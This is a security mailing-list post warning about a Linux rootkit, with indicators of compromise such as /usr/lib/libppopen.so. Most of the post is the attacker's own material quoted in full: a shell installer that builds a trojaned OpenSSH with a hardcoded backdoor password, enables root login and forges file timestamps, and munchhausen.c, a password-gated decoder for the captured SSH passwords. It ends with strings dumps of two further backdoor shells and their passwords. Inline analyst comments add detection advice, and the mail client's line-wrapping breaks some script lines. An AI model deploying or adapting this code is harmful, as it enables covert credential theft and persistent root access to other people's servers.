Hi guys:
Some new rootkit is kicking around:
If you have this file in your system:
/usr/lib/libppopen.so
you have most likely been compromised.
It seems the hacker recompiled a new ssh version to capture all the passwords
from an ssh session.
#!/bin/sh
# by me
# Analyst notes (review): attacker-side installer for a trojaned OpenSSH
# build, quoted as recovered from the compromised host. Several long lines
# were wrapped by the mail client (the second `if test`, the `sed` on
# sshd_config, the `adduser` call and the "moving the owld filez" comment,
# whose second half became a bare `users` line), so the script as quoted
# here does not run verbatim.
# Prepend the sbin directories so chattr, groupadd and adduser resolve.
export PATH=/usr/sbin:/sbin:/usr/local/sbin:/usr/local/bin:$PATH
pwd=$(pwd)
# Location of the live sshd; this is the binary that gets replaced below.
sshd=$(which sshd)
chown root:root *
# Mirror the host's PAM / GSSAPI settings so the trojaned build drops in
# with the existing sshd_config unchanged.
if test "$(grep ^UsePAM /etc/ssh/sshd_config)" != "" ; then
OPTS="--with-pam"
fi
if test "$(grep ^GSSAPIAuthentication /etc/ssh/sshd_config)" !=
"";then
KRB="--with-kerberos5=/usr/kerberos";
fi
# Clear immutable/append-only/secure-deletion attributes so the real
# binaries can be overwritten. Detection: the real sshd/ssh losing a
# previously set +i is a signal on hosts that use it.
chattr -isa /usr/sbin/sshd
chattr -isa /usr/bin/ssh
# Read the installed version from `ssh -V` (stderr lands in ./test) and
# bake the same string into version.h, so `ssh -V` on the trojaned build
# reports the original version and shows no difference.
ssh -V 2>test
ver=`cat test | cut -d "_" -f 2 | cut -d "," -f 1`
echo "[+] Current openssh version: $ver"
echo "[+] SSH Daemon location: $sshd"
# A backdoor password is hashed (md5, reformatted by hashhex.pl, which is
# not in this post) and patched over the UnFUnFp placeholder in the
# modified auth sources, so only the hash ends up in the binary.
pass="daredevilz"
md5=`echo -n $pass | openssl md5`
hexhashed=`perl hashhex.pl $md5`
sed -i -e "s/UnFUnFp/$hexhashed/g" auth-pam.c
sed -i -e "s/UnFUnFp/$hexhashed/g" auth-passwd.c
echo "[*] Info: using password: $pass"
echo "#define SSH_VERSION \"OpenSSH_$ver\"" > version.h
echo "#define SSH_RELEASE SSH_VERSION" >>version.h
echo -e "[+] configuring and compiling openssh.. "
echo -e "[+] Wait.."
#if test ! -e /usr/include/linux/zlib.h;then
# cd zlib-1.2.5;./configure --prefix=/usr && make && make install
#cd ..
#fi
# Built with the distro's prefix/sysconfdir so paths match the packaged sshd.
./configure --prefix=/usr \
--sysconfdir=/etc/ssh\
--with-md5-passwords --without-zlib-version-check $KRB
$OPTS && make all
# Everything below runs only if the build produced an sshd binary.
if test -x sshd ;then
# Live config change: root login is enabled. Detection: diff
# /etc/ssh/sshd_config against a known-good copy or the package manifest.
sed -i -e 's/PermitRootLogin no/PermitRootLogin yes/g'
/etc/ssh/sshd_config
# The munchhausen helper (munchhausen.c, quoted below) is built from the
# same tree and installed with timestamps copied from /bin/dd.
rm -rf munchhausen
make munchhausen
mv ./munchhausen /usr/bin
touch -acmr /bin/dd /usr/bin/munchhausen
echo -e "[+] Looking good"
# moving the owld filez.. striping new ones and setting up
users
# The original binaries survive as /etc/rpm/sshdOLD and /etc/rpm/sshOLD,
# a stable artifact to look for. The replacements are stripped and get
# their access/modification times copied from the original (sshd) and
# from /bin/ls (ssh), so mtime-based checks will not flag them; compare
# hashes against the package database instead.
mkdir /etc/rpm
mv sshd /etc/rpm
mv ssh /etc/rpm
cd /etc/rpm
chattr -iau $sshd
mv $sshd /etc/rpm/sshdOLD
mv /usr/bin/ssh /etc/rpm/sshOLD
mv sshd $sshd
mv ssh /usr/bin/ssh
strip $sshd
strip /usr/bin/ssh
touch -acmr /etc/rpm/sshdOLD $sshd
touch -acmr /bin/ls /usr/bin/ssh
# Note: this line names the literal /usr/bin/sshd rather than $sshd; with
# -c it neither creates that path nor changes anything when it is absent.
touch -acmr /bin/dd /usr/bin/sshd
unf=`grep sshd\: /etc/passwd`
# sshd needs a new user..
# Privilege-separation user and group are created only if absent (the
# adduser invocation is wrapped by the mail client). A freshly created
# sshd user on a host that never had one is another artifact to check.
if test "$unf" = "" ; then
echo "[-] user sshd not found"
echo -e "\t[+] creating one..."
mkdir /var/empty/sshd -p
chmod 755 /var/empty
/usr/sbin/groupadd sshd
/usr/sbin/adduser -c 'Privilege-separated SSH' -s
/dev/null -d /var/empty/sshd sshd -g sshd
echo -e "\t[+] user sshd created"
fi
mkdir /var/empty/sshd &>/dev/null
# Creates the world-writable /usr/lib/libppopen.so named at the top of the
# post. Nothing in this script writes to it; given the mode and the fact
# that munchhausen.c reads it back, it is presumably the capture file the
# patched sshd appends to -- confirm against the modified auth sources.
touch /usr/lib/libppopen.so
chmod 777 /usr/lib/libppopen.so
echo "[+] Testing if SSHd starts.."
$sshd -t
echo "Done."
# Reports listening port, uptime/load and kernel to whoever ran the installer.
echo -e "\n\t- openssh " `grep Port /etc/ssh/sshd_config`
echo -e "\t- `w | head -n 1`";
echo -e "\t- " `uname -a`
#echo -e "\t- $pass"
fi
#echo -e "\n\n\n-- Done"
#echo -e "\t Used pass: $pass"
#grep Port /etc/ssh/sshd_config
#cd $pwd
#tar xzf sbd.tgz;cd sbd;make;cd bin
#./inst
munchhausen.c
#include <stdio.h>
#include <stdlib.h>
// Analyst notes (review): companion tool to the installer above. With the
// UU environment variable set to the expected password it prints the
// contents of /usr/lib/libppopen.so with every byte bitwise-inverted, i.e.
// the file on disk is stored complemented and this program is its decoder.
// As quoted it does not compile cleanly: no <string.h> for memset/strcmp,
// implicit-int main, and the CHIU define below carries mail-mangled quotes.
// The argc parameter `c` is reused as the scratch variable for fgetc().
main(int c) {
const char *name = "UU";
char * p;
// Expected md5 hex digest of the password. The ³/² characters are
// mis-encoded double quotes, and "=== exemplu" (Romanian: "example")
// looks like a note by whoever quoted the source rather than part of
// the file; the hash itself is what to compare against a live sample.
#define CHIU ³49a10cfeeea16de1b123843bb086e5c1² === exemplu
p=getenv(name);
// No env var: prints a generic message so a casual run looks like an
// ordinary broken utility.
if(p == NULL){
printf("use --help for info\n");
exit(0);;
}
FILE *pipz;
char md5pwd[36],comm[1024];
memset(&md5pwd,'\0',sizeof(md5pwd));
memset(&comm,'\0',sizeof(comm));
// Hashes the env value by shelling out to echo|md5sum and reads the 32
// hex digits back; md5pwd was zeroed above so it stays NUL-terminated.
snprintf(comm,sizeof(comm),"/bin/echo -n %s|/usr/bin/md5sum",p);
if ((pipz=popen(comm,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipz);
pclose(pipz);
//printf("%s",md5pwd);
// Wrong password: same generic message as the no-env-var case.
if (strcmp(md5pwd, CHIU)){
printf("use --help for info\n");
exit(0);;
}
//printf(" %s\n",p);
FILE * pFile;
long lSize;
char * buffer;
int result;
pFile = fopen ( "/usr/lib/libppopen.so" , "rb" );
if (pFile==NULL) {fputs ("File error",stderr); exit (1);}
// Leftover from a whole-file read (the commented-out fread loop below):
// lSize and buffer are computed/allocated but never used or freed.
fseek (pFile , 0 , SEEK_END);
lSize = ftell (pFile);
rewind (pFile);
buffer = (char*) malloc (sizeof(char)*lSize);
if (buffer == NULL) {fputs ("Memory error",stderr); exit (2);}
// while(result = fread (buffer,1,lSize,pFile)){
// putchar(~result);
//}
// if (result != lSize) {fputs ("Reading error",stderr); exit (3);}
//dd=fopen("/usr/lib/libppopen.so","r");
// Byte-by-byte decode: each stored byte is written out complemented
// (putchar keeps the low 8 bits of ~c). The feof check after fgetc
// means the EOF value itself is never printed. To inspect a recovered
// libppopen.so without this tool, invert every byte of the file.
while(1) {
c = fgetc(pFile); if(feof(pFile )) break;
putchar(~c);
}
}
other files also found in the last attack:
-rwxr-xr-x 1 root root 68280 Jul 1 14:42 /usr/include/libutil2.1.h
/bin/zcat
In /etc/shadow, check whether the user daemon has a password set (it should be:
daemon:*: )
zcut file (password is master) md5:6d428b18f6a3045efe8a523184e9d87b
/lib/ld-linux.so.2
libc.so.6
printf
system
setgid
_IO_stdin_used
__libc_start_main
setuid
__gmon_start__
GLIBC_2.0
PTRh
W E L C O M E
master
/bin/bash
also udevconf (password is muieba) md5:87355eb73bf35e126764c35264762847
/lib/ld-linux.so.2
PTRh
IPQh4
Enter ze password:
ACCESS GRANTED
/root
HOME
/bin/bash -i
HISTFILE
HISTSIZE
HISTSAVE
Wrong password
muieba
_Jv_RegisterClasses
__gmon_start__
libc.so.6
unsetenv
puts
getpass
system
fflush
stdin
setgid
strncmp
seteuid
exit
_IO_stdin_used
__libc_start_main
setuid
GLIBC_2.0
/lib/ld-linux.so.2